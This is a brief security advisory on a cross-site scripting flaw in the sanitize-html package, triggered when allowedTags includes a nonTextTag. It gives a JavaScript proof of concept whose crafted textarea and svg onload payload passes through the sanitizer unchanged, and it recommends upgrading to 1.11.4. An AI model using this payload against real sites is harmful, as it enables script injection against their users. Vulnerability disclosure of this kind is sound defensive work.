Affected versions of sanitize-html are vulnerable to cross-site scripting when allowedTags includes at least one nonTextTag.
Proof of Concept
js var sanitizeHtml = require('sanitize-html');
var dirty = '!<textarea></textarea><svg/onload=promptxs></textarea>!'; var clean = sanitizeHtml(dirty, { allowedTags: [ 'textarea' ] });
console.log(clean);
// !<textarea></textarea><svg/onload=promptxs></textarea>!
Recommendation
Update to version 1.11.4 or later.